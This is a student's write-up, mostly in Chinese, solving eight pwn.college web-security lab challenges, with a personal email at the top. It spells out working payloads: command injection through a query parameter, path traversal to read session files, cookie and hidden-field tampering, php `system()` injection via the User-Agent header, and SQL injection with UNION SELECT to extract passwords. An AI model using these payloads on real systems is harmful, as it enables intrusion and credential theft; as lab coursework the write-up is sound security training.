username: Takodan
email: ychan175@asu.edu

# 1
1. 進網站, 點擊超連結, `GET /form.html`
2. 自動請求`GET /cgi-bin/verify.js`
3. Response:
```
function verify(form) {
	if ((form.username.value == "script") && (form.password.value == "kiddie")) {
	  alert("You got it! The secret is: pwn.college{...}");
        } else {
          alert("Wrong password!");
        }
}
```

# 2
1. 進網站, 點擊超連結, 請求`GET /users.html`
2. 等待一下會自動發送請求`GET /cgi-bin/users.php`
4. 攔截請求, 在`users.php`後面加上查詢參數`?filter=;ls`
5. 回應`<pre>secretuser.txt\nusers.php</pre>`
6. 頁面上`<div id="userlist">`的文字被改成`<pre>secretuser.txt\nusers.php</pre>`
7. 攔截請求, 在`users.php`後面加上查詢參數`?filter=;cat+secretuser.txt`
8. 回應`<pre>pwn.college{...}</pre>`

# 3
1. 進網站, 填寫form後submit
2. 請求`GET /cgi-bin/petition.py?first=F&last=W&email=fishw%40asu.edu&comment=wah&id=`
3. 回傳包含一組字串`Your ID is 43b4ea99e7dd48b687d772288fad1d00`
4. 回到一開始頁面, 輸入id後submit
5. 請求`GET /cgi-bin/petition.py?first=&last=&email=&comment=&id=43b4ea99e7dd48b687d772288fad1d00`
5. 回傳包含一組字串`Your comment was: pwn.college{..}`

# 4
1. 進網站 , 點擊表單發送請求
2. 請求`POST /cgi-bin/it.php`, 主體`username=&password=`
3. Response:
    1. 頭包含Set-Cookie: `Set-Cookie: PHPSESSID=80s78pl63c16hj3mb8c2v1g8c5; path=/`
    2. 主體包含input hidden: `<p><input type="hidden" name="nonce" value="635379058" /></p>`
4. 點擊表單`Submit`發送
    1. 請求`POST /cgi-bin/it.php`, 頭`Cookie: PHPSESSID=80s78pl63c16hj3mb8c2v1g8c5`
    2. 主體`filename=&data=&nonce=635379058`
5. Response
6. 輸入`../`點擊`Read`發送
    1. 頭: `POST /cgi-bin/it.php`
    2. 主體:`filename=..%2&readmode=yes&nonce=635379058`
7. 得到Response`.config<br>public_html<br>session<br>storage<br>`
8. 返回上一頁, 重新整理, 會發送和步驟4相同請求, 得到步驟5Response主體
9. 輸入`../session`點擊`Read`發送, 得到Response主體`sess_91c7e1e10744d69fd8fe35ecfc<br>`
10. 重複步驟8步驟9, 輸入`../session/sess_91c7e1e10744d69fd8fe35ecfc`
11. 得到Response`"username|s:4:"fish";password|s:32:"pwn.college{...}";..."`

# 5
1. 進入頁面, 兩個from都有隱藏input, name=admin value='0'
2. 根據提示嘗試
3. `POST /cgi-bin/store`給`Cookie:blacklist=store`和`admin=1`可以得到`store`程式碼
4. `POST /cgi-bin/store`給`Cookie:blacklist=retrieve`和`admin=1`可以得到`retrieve`程式碼
5. 閱讀程式碼, 得到`POST /cgi-bin/retrieve`所需要的`Cookie`鍵值有`site`和`password`
6. 閱讀程式碼, 得到`password`的值
7. `POST /cgi-bin/retrieve`給`Cookie:site=www.bank.com;password=terriblechoice`和`admin=1`
8. 得到儲存的密碼內容`www.bank.com:fish:pwn.college{...}`

# 6
1. 創立一個本地php文件, 裡面包含`system()`
2. `User-Agent`值作為注入, 運行本地php文件
3. 藉由修改本地php文件`system()`的參數遍歷檔案
4. 找到`/challenge/public_html/cgi-bin/s3cr37.pwd`輸出文字

# 7
1. query 格式`SELECT * FROM users WHERE username='" . $username . "'`
2. `1' or '1=1`, WHERE 會永遠為True, 程式碼會print 所有的username, firstname, lastname
3. `admin' UNION SELECT password, NULL, NULL, NULL, NULL, NULL FROM users WHERE username='admin`
4. 合併`WHERE username='admin`和`WHERE username='admin`的結果
5. 程式碼照常print username, 但是第二個結果的username 列被替換成password列, 程式碼會print出password

# 8
1. User輸入admin, Password輸入admin, 請求`GET /2factor.php`
2. Submit, 請求`POST /2factor.php`, Response包含一段Base64字串
3. 解碼Base64字串得到`pwn.college{...}`
    